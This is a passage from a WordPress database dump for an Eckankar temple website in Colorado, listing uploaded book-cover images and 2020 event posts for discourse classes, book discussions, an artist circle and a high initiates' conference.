21:56:42','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/hu-sos-bgrid-sized.png',0,'attachment','image/png',0),(254554,2,'2020-01-19 11:18:59','2020-01-19 18:18:59','','a-modern-prophet-answers-your-questions-book-1','','inherit','closed','closed','','a-modern-prophet-answers-your-questions-book-1','','','2020-01-19 11:18:59','2020-01-19 18:18:59','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/a-modern-prophet-answers-your-questions-book-1.jpg',0,'attachment','image/jpeg',0),(254555,2,'2020-01-19 11:19:01','2020-01-19 18:19:01','','a-modern-prophet-answers-your-questions-book-2','','inherit','closed','closed','','a-modern-prophet-answers-your-questions-book-2','','','2020-01-19 11:19:01','2020-01-19 18:19:01','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/a-modern-prophet-answers-your-questions-book-2.jpg',0,'attachment','image/jpeg',0),(254556,2,'2020-01-19 11:19:03','2020-01-19 18:19:03','','animals-are-soul-too','','inherit','closed','closed','','animals-are-soul-too','','','2020-01-19 11:19:03','2020-01-19 18:19:03','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/animals-are-soul-too.jpg',0,'attachment','image/jpeg',0),(254557,2,'2020-01-19 11:19:06','2020-01-19 18:19:06','','art-of-spiritual-dreaming','','inherit','closed','closed','','art-of-spiritual-dreaming','','','2020-01-19 11:19:06','2020-01-19 18:19:06','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/art-of-spiritual-dreaming.jpg',0,'attachment','image/jpeg',0),(254558,2,'2020-01-19 11:19:07','2020-01-19 18:19:07','','ask-the-master-book-1','','inherit','closed','closed','','ask-the-master-book-1','','','2020-01-19 11:19:07','2020-01-19 18:19:07','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/ask-the-master-book-1.jpg',0,'attachment','image/jpeg',0),(254559,2,'2020-01-19 11:19:09','2020-01-19 18:19:09','','ask-the-master-book-2','','inherit','closed','closed','','ask-the-master-book-2','','','2020-01-19 11:19:09','2020-01-19 18:19:09','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/ask-the-master-book-2.jpg',0,'attachment','image/jpeg',0),(254560,2,'2020-01-19 11:19:10','2020-01-19 18:19:10','','book-of-ECK-parables-book-1','','inherit','closed','closed','','book-of-eck-parables-book-1','','','2020-01-19 11:19:10','2020-01-19 18:19:10','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/book-of-ECK-parables-book-1.jpg',0,'attachment','image/jpeg',0),(254561,2,'2020-01-19 11:19:12','2020-01-19 18:19:12','','book-of-ECK-parables-book-2','','inherit','closed','closed','','book-of-eck-parables-book-2','','','2020-01-19 11:19:12','2020-01-19 18:19:12','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/book-of-ECK-parables-book-2.jpg',0,'attachment','image/jpeg',0),(254562,2,'2020-01-19 11:19:13','2020-01-19 18:19:13','','book-of-ECK-parables-book-3','','inherit','closed','closed','','book-of-eck-parables-book-3','','','2020-01-19 11:19:13','2020-01-19 18:19:13','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/book-of-ECK-parables-book-3.jpg',0,'attachment','image/jpeg',0),(254563,2,'2020-01-19 11:19:16','2020-01-19 18:19:16','','eck-essentials','','inherit','closed','closed','','eck-essentials','','','2020-01-19 11:19:16','2020-01-19 18:19:16','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/eck-essentials.jpg',0,'attachment','image/jpeg',0),(254564,2,'2020-01-19 11:19:18','2020-01-19 18:19:18','','how-the-inner-master-works','','inherit','closed','closed','','how-the-inner-master-works','','','2020-01-19 11:19:18','2020-01-19 18:19:18','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/how-the-inner-master-works.jpg',0,'attachment','image/jpeg',0),(254565,2,'2020-01-19 11:19:21','2020-01-19 18:19:21','','how-to-find-god','','inherit','closed','closed','','how-to-find-god','','','2020-01-19 11:19:21','2020-01-19 18:19:21','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/how-to-find-god.jpg',0,'attachment','image/jpeg',0),(254566,2,'2020-01-19 11:19:23','2020-01-19 18:19:23','','how-to-survive-spiritually','','inherit','closed','closed','','how-to-survive-spiritually','','','2020-01-19 11:19:23','2020-01-19 18:19:23','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/how-to-survive-spiritually.jpg',0,'attachment','image/jpeg',0),(254567,2,'2020-01-19 11:19:26','2020-01-19 18:19:26','','hu-most-beautiful-prayer','','inherit','closed','closed','','hu-most-beautiful-prayer','','','2020-01-19 11:19:26','2020-01-19 18:19:26','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/hu-most-beautiful-prayer.jpg',0,'attachment','image/jpeg',0),(254568,2,'2020-01-19 11:19:28','2020-01-19 18:19:28','','past-lives-dreams-and-soul-travel','','inherit','closed','closed','','past-lives-dreams-and-soul-travel','','','2020-01-19 11:19:28','2020-01-19 18:19:28','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/past-lives-dreams-and-soul-travel.jpg',0,'attachment','image/jpeg',0),(254569,2,'2020-01-19 11:19:31','2020-01-19 18:19:31','','road-to-spiritual-freedom','','inherit','closed','closed','','road-to-spiritual-freedom','','','2020-01-19 11:19:31','2020-01-19 18:19:31','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/road-to-spiritual-freedom.jpg',0,'attachment','image/jpeg',0),(254570,2,'2020-01-19 11:19:34','2020-01-19 18:19:34','','spiritual-exercises-of-eck','','inherit','closed','closed','','spiritual-exercises-of-eck','','','2020-01-19 11:19:34','2020-01-19 18:19:34','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/spiritual-exercises-of-eck.jpg',0,'attachment','image/jpeg',0),(254571,2,'2020-01-19 11:19:36','2020-01-19 18:19:36','','spiritual-experiences-guidebook','','inherit','closed','closed','','spiritual-experiences-guidebook','','','2020-01-19 11:19:36','2020-01-19 18:19:36','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/spiritual-experiences-guidebook.jpg',0,'attachment','image/jpeg',0),(254572,2,'2020-01-19 11:19:38','2020-01-19 18:19:38','','stories-of-past-lives-dreams-and-soul-travel','','inherit','closed','closed','','stories-of-past-lives-dreams-and-soul-travel','','','2020-01-19 11:19:38','2020-01-19 18:19:38','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/stories-of-past-lives-dreams-and-soul-travel.jpg',0,'attachment','image/jpeg',0),(254573,2,'2020-01-19 11:19:41','2020-01-19 18:19:41','','stranger-by-the-river','','inherit','closed','closed','','stranger-by-the-river','','','2020-01-19 11:19:41','2020-01-19 18:19:41','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/stranger-by-the-river.jpg',0,'attachment','image/jpeg',0),(254574,2,'2020-01-19 11:19:43','2020-01-19 18:19:43','','the-call-of-soul','','inherit','closed','closed','','the-call-of-soul','','','2020-01-19 11:19:43','2020-01-19 18:19:43','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/the-call-of-soul.jpg',0,'attachment','image/jpeg',0),(254575,2,'2020-01-19 11:19:46','2020-01-19 18:19:46','','the-flute-of-god','','inherit','closed','closed','','the-flute-of-god','','','2020-01-19 11:19:46','2020-01-19 18:19:46','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/the-flute-of-god.jpg',0,'attachment','image/jpeg',0),(254576,2,'2020-01-19 11:19:48','2020-01-19 18:19:48','','the-living-word-book-4','','inherit','closed','closed','','the-living-word-book-4','','','2020-01-19 11:19:48','2020-01-19 18:19:48','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/the-living-word-book-4.jpg',0,'attachment','image/jpeg',0),(254579,2,'2020-01-19 11:19:56','2020-01-19 18:19:56','','the-slow-burning-love-of-god','','inherit','closed','closed','','the-slow-burning-love-of-god','','','2020-01-19 11:19:56','2020-01-19 18:19:56','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/the-slow-burning-love-of-god.jpg',0,'attachment','image/jpeg',0),(254580,2,'2020-01-19 11:19:57','2020-01-19 18:19:57','','the-sound-of-soul','','inherit','closed','closed','','the-sound-of-soul','','','2020-01-19 11:19:57','2020-01-19 18:19:57','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/the-sound-of-soul.jpg',0,'attachment','image/jpeg',0),(254581,2,'2020-01-19 11:20:00','2020-01-19 18:20:00','','the-spiritual-laws-of-ECK','','inherit','closed','closed','','the-spiritual-laws-of-eck','','','2020-01-19 11:20:00','2020-01-19 18:20:00','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/the-spiritual-laws-of-ECK.jpg',0,'attachment','image/jpeg',0),(254582,2,'2020-01-19 11:20:03','2020-01-19 18:20:03','','the-tigers-fang','','inherit','closed','closed','','the-tigers-fang','','','2020-01-19 11:20:03','2020-01-19 18:20:03','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/the-tigers-fang.jpg',0,'attachment','image/jpeg',0),(254583,2,'2020-01-19 11:20:05','2020-01-19 18:20:05','','those-wonderful-eck-masters','','inherit','closed','closed','','those-wonderful-eck-masters','','','2020-01-19 11:20:05','2020-01-19 18:20:05','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/those-wonderful-eck-masters.jpg',0,'attachment','image/jpeg',0),(254584,2,'2020-01-19 11:20:08','2020-01-19 18:20:08','','wisdom-of-the-heart-book-1','','inherit','closed','closed','','wisdom-of-the-heart-book-1','','','2020-01-19 11:20:08','2020-01-19 18:20:08','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/wisdom-of-the-heart-book-1.jpg',0,'attachment','image/jpeg',0),(254585,2,'2020-01-19 11:20:11','2020-01-19 18:20:11','','wisdom-of-the-heart-book-3','','inherit','closed','closed','','wisdom-of-the-heart-book-3','','','2020-01-19 11:20:11','2020-01-19 18:20:11','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/wisdom-of-the-heart-book-3.jpg',0,'attachment','image/jpeg',0),(254586,2,'2020-01-19 11:20:14','2020-01-19 18:20:14','','youth-ask-a-modern-prophet','','inherit','closed','closed','','youth-ask-a-modern-prophet','','','2020-01-19 11:20:14','2020-01-19 18:20:14','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/youth-ask-a-modern-prophet.jpg',0,'attachment','image/jpeg',0),(254595,2,'2020-01-19 11:32:43','2020-01-19 18:32:43','','woman-ocean','','inherit','closed','closed','','woman-ocean','','','2020-01-19 11:33:40','2020-01-19 18:33:40','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/woman-ocean.jpg',0,'attachment','image/jpeg',0),(254622,2,'2020-01-19 12:09:30','2020-01-19 19:09:30','','the-sound-of-soul','','inherit','closed','closed','','the-sound-of-soul-2','','','2020-01-19 12:09:40','2020-01-19 19:09:40','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/the-sound-of-soul.png',0,'attachment','image/png',0),(254946,2,'2020-01-20 09:23:28','2020-01-20 16:23:28','<p><span style=\"font-size: 14pt;\"><span style=\"color: #f28a27;\"><b><em>\"The Living Word\" </em></b></span> - Book 4  —by Harold Klemp<br />\r\n</span>-- Did you know that there is a divine force which can guide you through the challenges you face each day of your life?</p>\r\n<p>Discover what you need for spiritual survival: How to open your heart, to receive and give unlimited love. A technique to get Spirit\'s guidance about your relationships, career, or health. How to tap what you learned in past lives, and put it to practical use today. A unique spiritual technique to sweep trouble out of your way. A secret word you can use to see the Light and hear the Sound of God, anytime you wish upliftment in your life. How to learn what happens to us after we die. The insights and techniques revealed in this book can show you how to be a spiritually better you - starting today.</p>','The Living Word (Bk 4) - Book Discussion','','publish','closed','closed','','book-discussion-6','','','2020-12-02 16:25:48','2020-12-02 23:25:48','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=254946',0,'tribe_events','',0),(256899,2,'2020-01-25 20:41:00','2020-01-26 03:41:00','','blubutterfly-orange-flower','','inherit','closed','closed','','blubutterfly-orange-flower','','','2020-01-25 20:41:00','2020-01-26 03:41:00','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/blubutterfly-orange-flower.jpg',0,'attachment','image/jpeg',0),(256900,2,'2020-01-25 20:41:03','2020-01-26 03:41:03','','bluerocks-butterfly','','inherit','closed','closed','','bluerocks-butterfly','','','2020-01-25 20:41:03','2020-01-26 03:41:03','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/bluerocks-butterfly.jpg',0,'attachment','image/jpeg',0),(256901,2,'2020-01-25 20:41:05','2020-01-26 03:41:05','','girl-tree-island','','inherit','closed','closed','','girl-tree-island','','','2020-01-25 20:41:05','2020-01-26 03:41:05','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/girl-tree-island.jpg',0,'attachment','image/jpeg',0),(256902,2,'2020-01-25 20:41:08','2020-01-26 03:41:08','','pink-flower-beach','','inherit','closed','closed','','pink-flower-beach','','','2020-01-25 20:41:08','2020-01-26 03:41:08','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/pink-flower-beach.jpg',0,'attachment','image/jpeg',0),(256903,2,'2020-01-25 20:41:11','2020-01-26 03:41:11','','purple-butterfly','','inherit','closed','closed','','purple-butterfly','','','2020-01-25 20:41:11','2020-01-26 03:41:11','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/purple-butterfly.jpg',0,'attachment','image/jpeg',0),(256904,2,'2020-01-25 20:41:15','2020-01-26 03:41:15','','rocks-in-clear-stream','','inherit','closed','closed','','rocks-in-clear-stream','','','2020-01-25 20:41:15','2020-01-26 03:41:15','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/rocks-in-clear-stream.jpg',0,'attachment','image/jpeg',0),(256905,2,'2020-01-25 20:41:17','2020-01-26 03:41:17','','rocks-sea-1','','inherit','closed','closed','','rocks-sea-1','','','2020-01-25 20:41:17','2020-01-26 03:41:17','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/rocks-sea-1.jpg',0,'attachment','image/jpeg',0),(256906,2,'2020-01-25 20:41:20','2020-01-26 03:41:20','','stacked-rocks','','inherit','closed','closed','','stacked-rocks','','','2020-01-25 20:41:20','2020-01-26 03:41:20','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/stacked-rocks.jpg',0,'attachment','image/jpeg',0),(256907,2,'2020-01-25 20:41:22','2020-01-26 03:41:22','','tulips-1','','inherit','closed','closed','','tulips-1','','','2020-01-25 20:41:22','2020-01-26 03:41:22','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/tulips-1.jpg',0,'attachment','image/jpeg',0),(256908,2,'2020-01-25 20:41:25','2020-01-26 03:41:25','','whiterocks-bluflower','','inherit','closed','closed','','whiterocks-bluflower','','','2020-01-25 20:41:25','2020-01-26 03:41:25','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/whiterocks-bluflower.jpg',0,'attachment','image/jpeg',0),(257041,2,'2020-01-26 10:28:48','2020-01-26 17:28:48','','harold-bg-tabs-H','','inherit','closed','closed','','harold-bg-tabs-h','','','2020-01-26 10:29:15','2020-01-26 17:29:15','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/01/harold-bg-tabs-H.jpg',0,'attachment','image/jpeg',0),(257090,0,'2020-01-27 18:02:23','2020-01-28 01:02:23','','','','publish','closed','closed','','257090','','','2020-01-27 18:02:23','2020-01-28 01:02:23','',0,'https://eckankar-colorado.org/nf_sub/257090/',0,'nf_sub','',0),(257091,0,'2020-01-28 14:29:29','2020-01-28 21:29:29','','','','publish','closed','closed','','257091','','','2020-01-28 14:29:29','2020-01-28 21:29:29','',0,'https://eckankar-colorado.org/nf_sub/257091/',0,'nf_sub','',0),(257171,2,'2020-01-31 10:06:36','2020-01-31 17:06:36','<p><span style=\"font-size: 16pt; color: #f28a27;\">Mystic World Discussion<br />\r\n<span style=\"color: #000000;\">-- </span></span>Join us to discuss the Mystic World, a quarterly publication that features the most recent articles from Sri Harld Klemp. It also contains questions to the Master, letters from chelas around the world, Vahana ideas, and more. This discussion meets at the ECK Temple of Colorado on a quarterly basis.</p>\r\n<p>The February discussion will focus on the entire December 2019 issue of the Mystic World.</p>\r\n<p><em>Attendees confirm their eligibility by bringing their own original copy of the publication (no photocopies). Those with a family ECK membership may share their copy</em></p>\r\n<p>&nbsp;</p>','Mystic World Discussion','','publish','closed','closed','','mystic-world-discussion','','','2020-01-31 10:08:39','2020-01-31 17:08:39','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=257171',0,'tribe_events','',0),(257222,2,'2020-01-31 10:32:06','2020-01-31 17:32:06','<p><span style=\"font-size: 16pt; color: #23507d;\">Arahata Training<br />\r\n</span>-- <strong>This Event Is Available To Members Of Eckankar Only --</strong><br />\r\n-- The Colorado Satsang Society will be offering Arahata Training to be held at the ECK Temple of Colorado starting on March 28, 2020. All Chelas that meet the qualifications are welcome to attend. Certified Arahatas are also welcome to attend if they would like to brush up on their skills, as well as chelas that might need one or more make-up sessions. (For Certified Arahatas, retaking the training is not required to serve as an Arahata.) For Assistant Arahatas, retaking the training offers the opportunity to get your certification (although certification will be based on meeting the qualifications and therefore is not guaranteed).</p>\r\n<p>Scheduled times are below:</p>\r\n<p><strong>Saturday, March 28 <br />\r\n<br />\r\n• Registration: 8:45 a.m. <br />\r\n<br />\r\n• Session 1: 9:00 a.m. - 12:00 p.m. <br />\r\n</strong>  (Chapter 1) <br />\r\n<br />\r\n<strong>•</strong> Lunch: 12:00 to 1:30 p.m.</p>\r\n<p><strong>• Session 2: 1:30 - 4:30 p.m. <br />\r\n</strong>  (Chapters 2 and 3)</p>','Arahata Training','','publish','closed','closed','','arahata-training','','','2020-01-31 10:32:06','2020-01-31 17:32:06','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=257222',0,'tribe_events','',0),(257270,2,'2020-01-31 10:42:01','2020-01-31 17:42:01','<p><span style=\"font-size: 16pt;\"><span style=\"color: #f28a27;\">ECK Artist Circle</span></span><br />\r\n<strong>— This Event Is Available To Members Of Eckankar —</strong><br />\r\n-- The purpose of the ECK artists circles is to serve as a vehicle for the Living ECK Master to present the message of ECK to the world through the visual arts. ECK artists circles can provide a way to develop artists to carry the message of ECK.</p>\r\n<p>Art exercises and techniques are explored with a spiritual emphasis at each meeting. ECK artists circles encourage members to strive for a high expression of the ECK through their art. The goals of the circles include helping the ECK artist:</p>\r\n<ul>\r\n	<li>Develop creative vision through the spiritual exercises of ECK</li>\r\n	<li>Recognize the ECK flowing through them as they work</li>\r\n	<li>Understand the four fundamentals of ECK and the way they apply to art for individual spiritual growth.</li>\r\n	<li>Explore how ECK art can help others recognize experiences of the Light and Sound in daily life</li>\r\n</ul>\r\n<p>If you are interested in joining the ECK artist circle, you are welcome to attend our next meeting.</p>\r\n<p>Please bring whatever medium you are comfortable working with—watercolors, pastels, colored pencils, or pen &amp; ink. During the summer months we plan to do some open air painting on the Temple grounds.</p>','ECK Artist Circle','','publish','closed','closed','','eck-artist-circle','','','2020-02-27 14:30:29','2020-02-27 21:30:29','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=257270',0,'tribe_events','',0),(257577,2,'2020-01-31 11:23:11','2020-01-31 18:23:11','<p><span style=\"font-size: 16pt; color: #f28a27;\">“ECK Satsang Discourses 1” – Member Class</span></p>\r\n<p><strong>--This Class Is Available To Members Of Eckankar--</strong></p>\r\n<p>-- ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. Each year-long discourse series is written by the spiritual leader of Eckankar. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</p>','ECK Satsang Discourses 1','','publish','closed','closed','','master-3-discourses','','','2020-12-04 10:01:52','2020-12-04 17:01:52','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=257577',0,'tribe_events','',0),(257613,2,'2020-01-31 11:29:45','2020-01-31 18:29:45','<p><span style=\"font-size: 16pt; color: #f28a27;\">“The Master 3 Discourses” – Member Class</span></p>\r\n<p><strong>--This Class Is Available To Members Of Eckankar--</strong></p>\r\n<p>-- ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. Each year-long discourse series is written by the spiritual leader of Eckankar. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</p>','The Master 3 Discourses','','publish','closed','closed','','the-master-3-discourses','','','2020-12-04 10:00:29','2020-12-04 17:00:29','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=257613',0,'tribe_events','',0),(257823,0,'2020-01-31 21:15:06','2020-02-01 04:15:06','','','','publish','closed','closed','','257823','','','2020-01-31 21:15:06','2020-02-01 04:15:06','',0,'https://eckankar-colorado.org/nf_sub/257823/',0,'nf_sub','',0),(257824,0,'2020-02-01 10:55:59','2020-02-01 17:55:59','','','','publish','closed','closed','','257824','','','2020-02-01 10:55:59','2020-02-01 17:55:59','',0,'https://eckankar-colorado.org/nf_sub/257824/',0,'nf_sub','',0),(258076,2,'2020-02-06 11:19:45','2020-02-06 18:19:45','','eck-on-youtube-sized-f','','inherit','closed','closed','','eck-on-youtube-sized-f','','','2020-02-06 11:20:14','2020-02-06 18:20:14','',7160,'https://eckankar-colorado.org/wp-content/uploads/2020/02/eck-on-youtube-sized-f.png',0,'attachment','image/png',0),(258287,0,'2020-02-10 16:16:05','2020-02-10 23:16:05','','','','publish','closed','closed','','258287','','','2020-02-10 16:16:05','2020-02-10 23:16:05','',0,'https://eckankar-colorado.org/nf_sub/258287/',0,'nf_sub','',0),(258304,0,'2020-02-15 17:56:49','2020-02-16 00:56:49','','','','publish','closed','closed','','258304','','','2020-02-15 17:56:49','2020-02-16 00:56:49','',0,'https://eckankar-colorado.org/nf_sub/258304/',0,'nf_sub','',0),(258305,0,'2020-02-15 20:42:31','2020-02-16 03:42:31','','','','publish','closed','closed','','258305','','','2020-02-15 20:42:31','2020-02-16 03:42:31','',0,'https://eckankar-colorado.org/nf_sub/258305/',0,'nf_sub','',0),(258359,2,'2020-02-16 12:14:26','2020-02-16 19:14:26','','shariyat-ki-sugmad-book-1','','inherit','closed','closed','','shariyat-ki-sugmad-book-1','','','2020-02-16 12:15:08','2020-02-16 19:15:08','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/02/shariyat-ki-sugmad-book-1.jpg',0,'attachment','image/jpeg',0),(258360,2,'2020-02-16 12:14:27','2020-02-16 19:14:27','','shariyat-ki-sugmad-book-2','','inherit','closed','closed','','shariyat-ki-sugmad-book-2','','','2020-02-16 12:14:27','2020-02-16 19:14:27','',0,'https://eckankar-colorado.org/wp-content/uploads/2020/02/shariyat-ki-sugmad-book-2.jpg',0,'attachment','image/jpeg',0),(258413,0,'2020-02-18 19:17:58','2020-02-19 02:17:58','','','','publish','closed','closed','','258413','','','2020-02-18 19:17:58','2020-02-19 02:17:58','',0,'https://eckankar-colorado.org/nf_sub/258413/',0,'nf_sub','',0),(258547,0,'2020-02-23 16:53:34','2020-02-23 23:53:34','','','','publish','closed','closed','','258547','','','2020-02-23 16:53:34','2020-02-23 23:53:34','',0,'https://eckankar-colorado.org/nf_sub/258547/',0,'nf_sub','',0),(259038,2,'2020-12-04 09:59:19','0000-00-00 00:00:00','<p><span style=\"font-size: 16pt; color: #f28a27;\">“The Master 1 Discourses” – Member Class</span></p>\r\n<p><strong>--This Class Is Available To Members Of Eckankar--</strong></p>\r\n<p>-- ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. Each year-long discourse series is written by the spiritual leader of Eckankar. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</p>','The Master 1 Discourses','','draft','closed','closed','','','','','2020-12-04 09:59:19','2020-12-04 16:59:19','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=259038',0,'tribe_events','',0),(259055,2,'2020-02-27 15:15:08','2020-02-27 22:15:08','<p><span style=\"font-size: 16pt; color: #f28a27;\">“The ECK Satsang Discourses - First Series” – Member Class</span></p>\r\n<p><strong>--This Class Is Available To Members Of Eckankar--</strong></p>\r\n<p>-- ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. Each year-long discourse series is written by the spiritual leader of Eckankar. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</p>','The ECK Satsang Discourses - First Series','','publish','closed','closed','','the-eck-satsang-discourses-first-series','','','2020-12-02 16:48:50','2020-12-02 23:48:50','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=259055',0,'tribe_events','',0),(259137,2,'2020-02-27 15:34:10','2020-02-27 22:34:10','<p><span style=\"font-size: 16pt; color: #f28a27;\">\"H.I. HU and Quarterly H. I. Meeting\" <br />\r\n</span></p>\r\n<p><strong>–This Meeting Is Available To High Initiates in Eckankar–</strong></p>\r\n<p>-- Please join us for our quarterly meeting. Bring a Chapter you would like to discuss from <em>\"Stranger by the River.\" </em></p>\r\n<p><strong>HI HU -  1:30 - 2:00 pm</strong> <br />\r\n<strong>Meeting and Discussion at 2:00</strong></p>','High Initiate HU and Quarterly High Initiate Meeting','','publish','closed','closed','','high-initiate-hu-and-quarterly-high-initiate-meeting','','','2020-02-27 15:34:52','2020-02-27 22:34:52','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=259137',0,'tribe_events','',0),(259252,2,'2020-02-27 21:04:37','2020-02-28 04:04:37','','about-background-6','','inherit','closed','closed','','about-background-6','','','2020-02-27 21:04:37','2020-02-28 04:04:37','',7162,'https://eckankar-colorado.org/wp-content/uploads/2020/02/about-background-6.jpg',0,'attachment','image/jpeg',0),(259263,2,'2020-02-27 21:09:48','2020-02-28 04:09:48','','about-background-8','','inherit','closed','closed','','about-background-8','','','2020-02-27 21:09:48','2020-02-28 04:09:48','',7162,'https://eckankar-colorado.org/wp-content/uploads/2020/02/about-background-8.jpg',0,'attachment','image/jpeg',0),(259324,2,'2020-02-29 15:27:15','2020-02-29 22:27:15','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 37px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\"></div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px; background-image: linear-gradient(to left, rgba(17, 90, 116, 0.63), rgba(17, 90, 116, 0.63)), url(\'https://demo2.cloudwp.dev/trial-4z924y49/wp-content/uploads/2020/02/waterbk-1.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://demo2.cloudwp.dev/trial-4z924y49/wp-content/uploads/2020/02/waterbk-1.jpg\" data-bg-overlaycolor=\"rgba(17,90,116,0.63)\">\r\n<div class=\"col-md-6 col-sm-6 col-xs-12\" style=\"background-color: rgba(255, 255, 255, 0.83);\">\r\n<h2 class=\"color3-color\" style=\"font-family: Open Sans; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">2020 Colorado/Utah<br>\r\nH.I. Conference</h2>\r\n<p class=\"\" style=\"font-family: Lusitana; font-weight: 600; font-size: 30px; color: #115a74;\" data-font-family=\"Lusitana\" data-font-weight=\"600\" data-font-style=\"\">Creating A Spiritual Legacy</p>\r\n<p class=\"\" style=\"font-family: Lusitana; font-weight: 600; font-size: 30px; color: #115a74; margin-top: -16px;\" data-font-style=\"\" data-font-family=\"Lusitana\" data-font-weight=\"600\">Through Service and Love</p>\r\n<p class=\"\" data-font-style=\"\" data-font-family=\"Lusitana\" data-font-weight=\"600\"><span style=\"font-size: 14pt;\"><strong><span style=\"font-size: 18pt;\">G</span>uest <span style=\"font-size: 18pt;\">S</span>peakers: Linda and Paul Morelli</strong></span><br>\r\n<span style=\"font-size: 12pt;\">Linda and Paul Morelli are members of the ECKANKAR clergy, </span><span style=\"font-size: 12pt;\">and serve together as Co-RESA’s of New York.</span></p>\r\n<p class=\"\" style=\"font-size: 16px;\">\"All who have a deep desire to reach the heights of love and service to God need to look no farther than their own hearts. It’s all about consciousness. It’s all about love for God, the holy ECK, and the Mahanta.\"</p>\r\n<p class=\"\" style=\"font-size: 13px;\">&nbsp;—Sri Harold Klemp, <em>Wisdom from the Master on Spiritual Leadership</em>, Book 2, p. 408</p>\r\n</div>\r\n<div class=\"col-md-4 col-sm-6 col-xs-12\">\r\n<p class=\"color1-color\" style=\"font-size: 30px; font-weight: 600; padding: 0em 0px 0px; margin-top: 8px; margin-bottom: -6px; line-height: 37px;\" data-font-weight=\"600\">A Conference For<br>\r\nEckankar<br>\r\nHigh Initiates</p>\r\n<p class=\"color1-color\" style=\"font-size: 30px; font-weight: 600; padding: 0px; margin-top: 20px;\" data-font-weight=\"600\">May 15-17, 2020</p>\r\n<p class=\"\" data-font-weight=\"600\">&nbsp;</p>\r\n<p class=\"color1-color\" style=\"font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">ECK Temple of Colorado<br>\r\n7100 West Mississippi, Lakewood, CO</p>\r\n<p class=\"\" data-font-weight=\"600\">&nbsp;</p>\r\n<p class=\"\"><a class=\"btn btn-rounded btn-color-1 btn-raised\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/2020-h-i-conference-password-protected-page/\" data-font-weight=\"600\">REGISTER NOW!</a></p>\r\n</div>\r\n<div class=\"col-md-2 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignright size-full wp-image-233278\" 